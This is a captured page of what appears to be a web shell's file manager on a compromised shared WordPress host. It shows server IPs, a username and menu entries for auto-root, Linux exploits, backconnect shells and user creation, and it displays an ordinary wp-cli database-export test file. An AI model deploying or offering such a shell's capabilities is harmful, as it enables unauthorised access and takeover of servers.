Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
wp-cli /
db-command /
features /
[ HOME SHELL ]
Name
Size
Permission
Action
db-check.feature
3.67
KB
-rw-r--r--
db-columns.feature
3.56
KB
-rw-r--r--
db-export.feature
2.49
KB
-rw-r--r--
db-import.feature
4.9
KB
-rw-r--r--
db-prefix.feature
224
B
-rw-r--r--
db-query.feature
3.14
KB
-rw-r--r--
db-search.feature
29.69
KB
-rw-r--r--
db-size.feature
5.96
KB
-rw-r--r--
db-tables.feature
5.95
KB
-rw-r--r--
db.feature
8.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : db-export.feature
Feature: Export a WordPress database Scenario: Database exports with random hash applied Given a WP install When I run `wp db export --porcelain` Then STDOUT should contain: """ wp_cli_test- """ And the wp_cli_test.sql file should not exist Scenario: Database export to a specified file path Given a WP install When I run `wp db export wp_cli_test.sql --porcelain` Then STDOUT should contain: """ wp_cli_test.sql """ And the wp_cli_test.sql file should exist Scenario: Exclude tables when exporting the database Given a WP install When I run `wp db export wp_cli_test.sql --exclude_tables=wp_users --porcelain` Then the wp_cli_test.sql file should exist And the wp_cli_test.sql file should not contain: """ wp_users """ And the wp_cli_test.sql file should contain: """ wp_options """ Scenario: Export database to STDOUT Given a WP install When I run `wp db export -` Then STDOUT should contain: """ -- Dump completed on """ Scenario: Export database with mysql defaults to STDOUT Given a WP install When I run `wp db export --defaults -` Then STDOUT should contain: """ -- Dump completed on """ Scenario: Export database with mysql --no-defaults to STDOUT Given a WP install When I run `wp db export --no-defaults -` Then STDOUT should contain: """ -- Dump completed on """ Scenario: Export database with passed-in options Given a WP install When I run `wp db export - --dbpass=password1 --skip-comments` Then STDOUT should not contain: """ -- Table structure """ When I try `wp db export - --dbpass=no_such_pass` Then the return code should not be 0 And STDERR should contain: """ Access denied """ And STDOUT should be empty Scenario: MySQL defaults are available as appropriate with --defaults flag Given a WP install When I try `wp db export --defaults --debug` Then STDERR should match #Debug \(db\): Running initial shell command: /usr/bin/env (mysqldump|mariadb-dump)# When I try `wp db export --debug` Then STDERR should match #Debug \(db\): Running initial shell command: /usr/bin/env (mysqldump|mariadb-dump) --no-defaults# When I try `wp db export --no-defaults --debug` Then STDERR should match #Debug \(db\): Running initial shell command: /usr/bin/env (mysqldump|mariadb-dump) --no-defaults#
Close